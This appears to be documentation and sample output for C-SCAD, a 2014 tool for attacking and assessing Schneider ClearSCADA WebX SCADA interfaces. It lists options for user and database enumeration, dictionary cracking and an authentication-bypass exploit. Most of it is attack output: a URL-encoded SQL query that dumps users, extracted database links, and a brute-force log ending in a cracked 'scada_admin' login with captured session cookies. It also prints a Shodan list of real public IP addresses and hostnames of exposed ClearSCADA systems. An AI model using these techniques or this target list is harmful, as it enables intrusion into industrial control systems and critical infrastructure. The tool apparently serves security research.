Documentation - Examples : C-SCAD - Assessing Security Flaws in C-SCAD Web-X Client !


[*] C-SCAD Usage Parameters

	-----------------------------------------------------------
  
	 ______               ______    ______    ________    ______
	/_____/\             /_____/\  /_____/\  /_______/\  /_____/\     
	\:::__\/     _______ \::::_\/_ \:::__\/  \::: _  \ \ \:::_ \ \    
	 \:\ \  __  /______/\ \:\/___/\ \:\ \  __ \::(_)  \ \ \:\ \ \ \   
	  \:\ \/_/\ \__::::\/  \_::._\:\ \:\ \/_/\ \:: __  \ \ \:\ \ \ \  
	   \:\_\ \ \            /____ \:\ \:\_\ \ \ \:.\ \  \ \ \:\/.:| | 
	    \_____\/            \_____\/   \_____\/  \__\/\__\/  \____/_/ 
	     		                                                                                                
        C-SCAD : Schneider ClearSCADA: WebX (Client) Security Assessment Tool!
        Authored by: Aditya K Sood |contact [at] secniche.org  | 2014
        Twitter:     @AdityaKSood
        Powered by: SecNiche Security Labs ! (http://www.secniche.org)
        
        ClearSCADA : http://www.schneider-electric.com/products/
        ClearSCADA Spec : http://plcsystems.ru/catalog/SCADAPack/doc/ClearSCADA_spec_eng.pdf
        
	----------------------------------------------------------
Usage: cscad_v_1.0.py [options]

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit

  Access Configuration::
    -c CONFIG, --config_check=CONFIG
                        <CONFIGURATION = full> -- to check access permissions
                        on the directory structure of CleaSCADA !

  Enumeration::
    -e ENUMERATION, --enum=ENUMERATION
                        <ENUMERATION = users | database | database_links |
                        list_sql | list_reports | snmp_check |
                        accumulator_check > -- to enumerate the list of
                        available users, databases, reports and available sql
                        commands !

  Dictionary Crack::
    -a DICT_ATTACK, --dict_attack=DICT_ATTACK
                        <DICT ATTACK = dict_attack> -- to trigger dictionary
                        based cracking !

  Diagnostics::
    -d DIAG_ACCESS, --diag_access=DIAG_ACCESS
                        <DIAGNOSTICS = diag_access | dump_diag_data> -- to
                        verify the access to diagnostic webpage and dump data
                        !

  Shodan Search::
    -s SHODAN, --shodan_search=SHODAN
                        <SHODAN SEARCH = sh_search | shodan_search> -- to
                        search ClearSCADA exposed WebX interface using Shodan
                        search engine. URL option should be set to : -u =
                        shodanhq.com !

  Vulnerability Check::
    -b AUTH_BYPASS, --auth-bypass=AUTH_BYPASS
                        <EXPLOIT CODE = auth_bypass> -- exploit code for
                        ICSA-11-173-01 ClearSCADA Remote Authentication Bypass
                        Vulnerability !

[*] Generic Configuration Check

# python cscad_v_1.0.py -u 10.0.1.8 -c full

[*] https://10.0.1.8 is configured with SSL ! GOOD !
[+] engaging with target : (https://10.0.1.8)
[+] HTTP code returned : (200)
[+] configured ClearScada web server version: (ClearSCADA/6.74.5192.1)
[+] (https://10.0.1.8/file/help_en-US/Content/WelcomePage.htm) - (200)
[+] Seems help files are present : https://10.0.1.8/file/help_en-US/Content/WelcomePage.htm
[*] Trying to extract installed ClearSCADA version !
[+] Installed version is: ['http://www.w3.org/1999/xhtml']

[+] --------------------------------------------------------
[+] checking directory (exposed) access permissions ..... !
[+] --------------------------------------------------------
[+] (https://10.0.1.8/db/) - (200)
[+] (https://10.0.1.8/alarms/) - (200)
[+] (https://10.0.1.8/list/) - (200)
[+] (https://10.0.1.8/logon/) - (200)
[+] (https://10.0.1.8/webservices) - (200)

[*] Web-X - Users Enumeration

[*] https://10.0.1.8 is configured with SSL ! GOOD !
[+] engaging with target : (https://10.0.1.8)
[+] HTTP code returned : (200)
[+] configured ClearScada web server version: (ClearSCADA/6.74.5192.1)
[+] trying to access users list with query : /list/Users?SELECT%20%22FullName%22%20AS%20%22~FullName%22%2c%20%22Id%22%2c%20%22Foreground%22%2c%20%22Blink%22%2c%20%22Background%22%2c%20%22PasswordExpiryTime%22%2c%20%22UserGroupNames%22%2c%20%22TypeDesc%22%2c%20%22MemoryUsage%22%20FROM%20CDBUser%20ORDER%20BY%20%22~FullName%22%20ASC
<?xml version="1.0"?>

<Page>
<List>
<Columns>
<Column>FullName</Column>
<Column>Id</Column>
<Column>Foreground</Column>
<Column>Blink</Column>
<Column>Background</Column>
<Column>PasswordExpiryTime</Column>
<Column>UserGroupNames</Column>
<Column>TypeDesc</Column>
<Column>MemoryUsage</Column>
</Columns>
<Rows>
<Row>
<Value>Example Projects.~Config.Users.Reporter</Value>
<Value>5232</Value>
<Value>0</Value>
<Value>False</Value>
<Value>16777215</Value>
<Value>25/10/2014 21:44:08.816</Value>
<Value></Value>
<Value>User</Value>
<Value>3488</Value>
</Row>
<Row>
<Value>Users.Eng</Value>
<Value>6448</Value>
<Value>0</Value>
<Value>False</Value>
<Value>16777215</Value>
<Value>31/03/1601 17:00:00.000</Value>
<Value>Users.Groups.Engineer Group</Value>
<Value>User</Value>
<Value>6214</Value>
</Row>
<Row>
<Value>Users.Sales</Value>
<Value>6452</Value>
<Value>0</Value>
<Value>False</Value>
<Value>16777215</Value>
<Value>31/03/1601 17:00:00.000</Value>
<Value>Users.Groups.Sales Group</Value>
<Value>User</Value>
<Value>4702</Value>
</Row>
</Rows>
</List>
</Page>

[*] SQL Commands Check - User for Querying Database

[+] ---------------------------------------------------------
[+] allowed SQL commands [/list/] through - ViewXCtrl in IE are 
[+] -----------------------------------------------------------
[*] https://10.0.1.8 is configured with SSL ! GOOD !
[+] engaging with target : (https://10.0.1.8)
[+] HTTP code returned : (200)
[+] configured ClearScada web server version: (ClearSCADA/6.74.5192.1)
[Command] : Accumulators 
[Query] : SELECT "FullName" AS "~FullName", "Id", "Foreground", "Blink", "Background", "CurrentTotalFormatted", "CurrentTotalTime", "CurrentTotalQualityDesc", "TypeDesc", "MemoryUsage" FROM CAccumulatorBase ORDER BY "~FullName" ASC"
---------------------------------------------------
[Command] : Advanced EWS Groups 
[Query] : SELECT "FullName" AS "~FullName", "Id", "Foreground", "Blink", "Background", "StateDesc", "DataTimestamp", "QualityDesc", "CurrentRequest", "SourceName", "Source", "TypeDesc", "MemoryUsage", "AlarmViewLink" FROM CAdvancedEWSGroup ORDER BY "~FullName" ASC"
---------------------------------------------------
[Command] : Advanced EWS Servers 
[Query] : SELECT "FullName" AS "~FullName", "Id", "Foreground", "Blink", "Background", "StateDesc", "DataTimestamp", "QualityDesc", "Source", "TypeDesc", "MemoryUsage", "AlarmViewLink" FROM CAdvancedEWSServer ORDER BY "~FullName" ASC"
---------------------------------------------------

[*] Available Database Links for Extracting Information !

[+] ------------------------------------------------------------------
[+] extracted links from available databases on the target system are:  
[+] -------------------------------------------------------------------
[*] https://10.0.1.8 is configured with SSL ! GOOD !
[+] engaging with target : (https://10.0.1.8)
[+] HTTP code returned : (200)
[+] configured ClearScada web server version: (ClearSCADA/6.74.5192.1)
[*] extracting database links from - https://10.0.1.8/db/?view
[L] https://10.0.1.8/db/Example%20Projects
[L] https://10.0.1.8/db/Example%20Projects.Electricity
[L] https://10.0.1.8/db/Example%20Projects.Electricity.Generation
[L] https://10.0.1.8/db/Example%20Projects.Electricity.Generation.12kV-120V%20Transformer
[L] https://10.0.1.8/db/Example%20Projects.Electricity.Generation.Factory
[L] https://10.0.1.8/db/Example%20Projects.Electricity.Generation.Factory.Logic
[L] https://10.0.1.8/db/Example%20Projects.Electricity.Generation.Graphics
[L] https://10.0.1.8/db/Example%20Projects.Electricity.Generation.House
[L] https://10.0.1.8/db/Example%20Projects.Electricity.Generation.House.Logic
[L] https://10.0.1.8/db/Example%20Projects.Electricity.Generation.Power%20Meter%20Display
[L] https://10.0.1.8/db/Example%20Projects.Electricity.Generation.Power%20Meter%20Display.Graphics

[*] Dictionary Attack [/h3>
[*] https://10.0.1.8 is configured with SSL ! GOOD !
[+] engaging with target : (https://10.0.1.8)
[+] HTTP code returned : (200)
[+] configured ClearScada web server version: (ClearSCADA/6.74.5192.1)

[+] reading user names from users.txt file !
[+] reading password from pass.txt file !
[*] user and password list is constructed successfully!
[*] executing dictionary attack against : https://10.0.1.8/logon
[FAILED] (bill) | (scada_admin) 
[FAILED] (bill) | (bill) 
[FAILED] (bill) | (marvin) 
[FAILED] (bill) | (michele) 
[FAILED] (bill) | (rand) 
[FAILED] (bill) | (randy) 
[FAILED] (bill) | (remy) 
[FAILED] (bill) | (stacey) 
[FAILED] (bill) | (darr) 
[FAILED] (bill) | (engineer) 
[FAILED] (bill) | (sales) 
[FAILED] (bill) | (eng) 
[FAILED] (bill) | (admin) 
[FAILED] (bill) | (manager) 
[FAILED] (bill) | (guest) 
[FAILED] (bill) | (operator) 
[FAILED] (bill) | (Operator) 
[FAILED] (bill) | (Eng) 
[FAILED] (bill) | (Sales) 
[FAILED] (bill) | (welcome) 
[FAILED] (bill) | (Welcome) 
[FAILED] (bill) | (guest) 
[FAILED] (bill) | (Reporter) 
----------------------------------------------------------------------------------
[SUCCESS] (scada) | (scada_admin) (VIOLA, HUSTLE!)
[Cookie]  (CLEARSCADAUSERID={A8807501-A4F8-45AF-BA8D-94E4979186ED};Version=1;Path=/;Comment=Schneider Electric ClearSCADA User Identification, CLEARSCADASECUREUSERID={8CF68D03-1D99-451C-9979-4EA7C0C4E638};Secure;Version=1;Path=/;Comment=Schneider Electric ClearSCADA User Identification)
----------------------------------------------------------------------------------
[FAILED] (scada) | (bill) 
[FAILED] (scada) | (marvin) 

[*] Shodan Search !

	----------------------------------------------------------

[*] ----------------------------------------------------------------
[*] total number of SHODAN results found for ClearSCADA: 268
[*] ----------------------------------------------------------------
IP:PORT:HOSTNAME  208.42.207.103:443:[u'208-42-207-103.clec.stat.centurytel.net']
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  174.120.177.8:80:[u'8.b1.78ae.static.theplanet.com']
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  168.61.47.65:80:[]
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  173.239.110.25:443:[]
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  64.17.6.51:443:[u'net64-17-6-51.static-customer.corenap.com']
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  174.46.209.221:443:[u'174-46-209-221.static.twtelecom.net']
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  98.18.85.146:443:[u'h146.85.18.98.static.ip.windstream.net']
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  98.23.98.19:81:[u'mail.champautomation.com']
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  216.82.143.97:80:[u'rno-dsl1b-097.gbis.net']
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  173.71.30.108:443:[u'static-173-71-30-108.dllstx.fios.verizon.net']
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  70.166.250.28:80:[u'wsip-70-166-250-28.ks.ks.cox.net']
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  24.173.105.132:443:[u'rrcs-24-173-105-132.sw.biz.rr.com']
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  65.87.254.72:443:[]
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  69.31.237.148:443:[u'h69-31-237-148.static.platinum.ca']
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  166.248.110.44:443:[u'44.sub-166-248-110.myvzw.com']
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  203.45.45.72:443:[u'hunter85.lnk.telstra.net']
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  166.78.78.154:443:[]
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  12.178.51.10:80:[u'mobile.tid.org']
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  5.149.184.87:80:[]
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  187.217.177.132:443:[u'customer-187-217-177-132.uninet-ide.com.mx']
------------------------------------------------------------------------------------------
IP:PORT:HOSTNAME  173.210.208.37:80:[]


Note: Please read the C-SCAD presentation for more details or try it :)